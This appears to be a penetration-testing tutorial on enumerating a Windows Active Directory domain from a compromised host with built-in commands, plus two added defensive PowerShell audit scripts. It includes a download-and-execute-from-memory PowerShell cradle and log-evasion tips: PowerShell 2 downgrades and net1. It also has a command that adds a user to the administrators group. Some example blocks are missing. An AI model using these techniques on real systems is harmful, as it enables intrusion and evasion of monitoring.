Earlier, we learned about how to enumerate the domain from the beachhead by importing tools and scripts to the system.
In this part, I will write about using native Windows tools to perform our enumeration.
Basic Commands
| Command | Result |
| --- | --- |
| `hostname` | Prints the PC's name |
| `[System.Environment]::OSVersion.Version` | Prints the OS version and revision level |
| `wmic qfe get Caption,Description,HotFixID,InstalledOn` | Prints the patches and hotfixes applied to the host |
| `ipconfig /all` | Prints the network adapter state and configuration |
| `set` | Displays the environment variables for the current session (run from a CMD prompt) |
| `echo %USERDOMAIN%` | Displays the domain name to which the host belongs (run from a CMD prompt) |
| `echo %logonserver%` | Prints the name of the domain controller the host checks in with (run from a CMD prompt) |
| `systeminfo` | Prints a summary of the host's information in one tidy output |

Running the single systeminfo command is better than running the others one by one because it generates fewer logs.
PowerShell
PowerShell has been around since 2006.

| Cmdlet | Description |
| --- | --- |
| `Get-Module` | Lists the modules that are loaded and available for use. |
| `Get-ExecutionPolicy -List` | Prints the execution policy settings for each scope on the host. |
| `Set-ExecutionPolicy Bypass -Scope Process` | Changes the policy for our current process only, using the -Scope parameter. The policy reverts once we leave or terminate the process, which is ideal because we make no permanent change to the victim host. |
| `Get-ChildItem Env: \| ft Key,Value` | Returns environment values such as key paths, users, computer information, etc. |
| `powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"` | A quick and easy way to download a file from the web with PowerShell and run it from memory. |

Reading a specified user's PowerShell history can also be quite helpful, as the command history may contain passwords or point us toward configuration files or scripts that contain passwords.
Downgrade PowerShell
Sometimes several versions of PowerShell exist on a host.
If we use an older version of PowerShell that is no longer in normal use, our actions from that shell will not be logged in Event Viewer.
Notice the change in version after using powershell2:
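From the defender's side, the downgrade trick above only works when the old engine is still installed and script block logging is not enforced. The following audit function is an added example, not code from the original post; it assumes a Windows 8 / Server 2012 or later host run from an elevated prompt (Get-WindowsOptionalFeature requires it) and reads the standard PowerShell logging policy keys.

```powershell
# Added example (not from the original post): check whether the PowerShell 2.0
# engine is still present and whether script block / module logging are enforced,
# so a defender can tell if "powershell -version 2" would leave a logging gap.
# Assumes an elevated prompt on Windows 8 / Server 2012 or later.

function Get-PowerShellLoggingPosture {
    [CmdletBinding()]
    param()

    # The 2.0 engine ships as an optional feature; "Enabled" means a downgraded
    # shell will run and will not emit v5-style script block log entries.
    $v2 = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2 -ErrorAction SilentlyContinue

    # Policy keys written by the "Turn on PowerShell Script Block Logging" and
    # "Turn on Module Logging" group policy settings.
    $sbl = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging' -ErrorAction SilentlyContinue
    $mod = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging' -ErrorAction SilentlyContinue

    [pscustomobject]@{
        RunningVersion     = $PSVersionTable.PSVersion.ToString()
        V2EngineState      = if ($v2) { $v2.State.ToString() } else { 'NotPresent' }
        ScriptBlockLogging = [bool]($sbl.EnableScriptBlockLogging -eq 1)
        ModuleLogging      = [bool]($mod.EnableModuleLogging -eq 1)
    }
}

$posture = Get-PowerShellLoggingPosture
$posture | Format-List

# Flag the two conditions that make the downgrade useful to an attacker.
if ($posture.V2EngineState -eq 'Enabled') {
    Write-Warning 'PowerShell 2.0 engine is enabled; a -version 2 shell will not produce script block logs (event 4104).'
}
if (-not $posture.ScriptBlockLogging) {
    Write-Warning 'Script block logging is not enforced by policy.'
}
```

Disabling the MicrosoftWindowsPowerShellV2 feature and enforcing script block logging closes the gap the downgrade relies on.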
Checking Defense
Let’s check on Windows Firewall settings and Windows Defender status.
Firewall Checks
Windows Defender Check
Get-MpComputerStatus
Let's check the status and configuration settings.
From the output we can see what revision our AV settings are at and which settings are enabled or disabled.
Am I Alone?
Let's check whether there are other users on the system.
If an attacker attempts actions while a different user is logged on to the system, it might alert that user.
qwinsta
Network Enumeration
Now we have a solid feel for the state of our host.
Let's enumerate the network settings for our host and identify any potential domain machines and services to target.

| Command | Description |
| --- | --- |
| `arp -a` | Lists all known hosts stored in the ARP table. |
| `ipconfig /all` | Prints the adapter settings for the host. We can figure out the network segment from here. |
| `route print` | Displays the routing table (IPv4 and IPv6), identifying known networks and layer three routes shared with the host. |
| `netsh advfirewall show state` | Displays the status of the host's firewall. We can determine whether it is active and filtering traffic. |
Windows Management Instrumentation
WMI is a scripting engine that is widely used within Windows enterprise environments to retrieve information and run administrative tasks on local and remote hosts.
We can ask for:
Domain users
Groups
Processes
etc.

| Command | Description |
| --- | --- |
| `wmic qfe get Caption,Description,HotFixID,InstalledOn` | Prints the patch level and description of the hotfixes applied |
| `wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List` | Displays basic host information, including any attributes within the list |
| `wmic process list /format:list` | A listing of all processes on the host |
| `wmic ntdomain list /format:list` | Displays information about the domain and domain controllers |
| `wmic useraccount list /format:list` | Displays information about all local accounts and any domain accounts that have logged into the device |
| `wmic group list /format:list` | Information about all local groups |
| `wmic sysaccount list /format:list` | Dumps information about any system accounts that are being used as service accounts |
Let’s query for domain and child domain:
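One caveat a practitioner will hit: wmic.exe is deprecated and absent on recent Windows 11 builds. The function below is an added example, not from the original post, that expresses the same queries (patches, computer system, NT domains including any child domains the host knows about, and system accounts) with Get-CimInstance, which keeps working where wmic is gone. It assumes only a domain-joined Windows host with the CIM cmdlets available.

```powershell
# Added example (not from the original post): Get-CimInstance equivalents of the
# wmic queries above, returned as objects rather than text so they can be
# filtered or exported. Assumes a Windows host with the CIM cmdlets (PS 3.0+).

function Get-HostWmiSummary {
    [CmdletBinding()]
    param()

    # wmic qfe get Caption,Description,HotFixID,InstalledOn
    $hotfixes = Get-CimInstance -ClassName Win32_QuickFixEngineering |
        Select-Object HotFixID, Description, InstalledOn

    # wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles
    $cs = Get-CimInstance -ClassName Win32_ComputerSystem |
        Select-Object Name, Domain, Manufacturer, Model, UserName, PartOfDomain

    # wmic ntdomain list: one row per domain the host knows about, which is
    # where a child domain or trusted domain shows up alongside our own.
    $domains = Get-CimInstance -ClassName Win32_NTDomain |
        Where-Object { $_.DomainName } |
        Select-Object DomainName, DnsForestName, DomainControllerName

    # wmic sysaccount list: built-in system accounts and their SIDs
    $sysAccounts = Get-CimInstance -ClassName Win32_SystemAccount |
        Select-Object Name, SID, Domain

    [pscustomobject]@{
        Computer    = $cs
        Hotfixes    = $hotfixes
        Domains     = $domains
        SysAccounts = $sysAccounts
    }
}

$summary = Get-HostWmiSummary
$summary.Computer | Format-List
$summary.Domains  | Format-Table -AutoSize
"Patches installed: $(@($summary.Hotfixes).Count)"
```

Because the result is an object, `$summary | Export-Clixml host.xml` preserves everything for later review without re-running the queries on the host.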
Net Commands
Net commands can be used to enumerate information from the domain:
Local and domain users
Groups
Hosts
Specific users in groups
Domain controllers
Password requirements

| Command | Description |
| --- | --- |
| `net accounts` | Information about password requirements |
| `net accounts /domain` | Password and lockout policy |
| `net group /domain` | Information about domain groups |
| `net group "Domain Admins" /domain` | List users with domain admin privileges |
| `net group "domain computers" /domain` | List of PCs connected to the domain |
| `net group "Domain Controllers" /domain` | List PC accounts of domain controllers |
| `net group <domain_group_name> /domain` | Users that belong to the group |
| `net groups /domain` | List of domain groups |
| `net localgroup` | All available groups |
| `net localgroup administrators /domain` | List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default) |
| `net localgroup Administrators` | Information about a group (admins) |
| `net localgroup administrators [username] /add` | Add a user to administrators |
| `net share` | Check current shares |
| `net user <ACCOUNT_NAME> /domain` | Get information about a user within the domain |
| `net user /domain` | List all users of the domain |
| `net user %username%` | Information about the current user |
| `net use x: \\computer\share` | Mount the share locally |
| `net view` | Get a list of computers |
| `net view /all /domain[:domainname]` | Shares on the domains |
| `net view \\computer /ALL` | List shares of a computer |
| `net view /domain` | List of PCs of the domain |

If we believe network defenders are actively logging any commands that are out of the ordinary, use net1 instead of net.
Dsquery
What this tool does can be easily replicated with tools such as BloodHound and PowerView.
You can find it at C:\Windows\System32\dsquery.dll.
We need a SYSTEM-level terminal to use it.
User search:
Computer search:
Wildcard search:
Users with PASSWD_NOTREQD flag set in the userAccountControl attribute: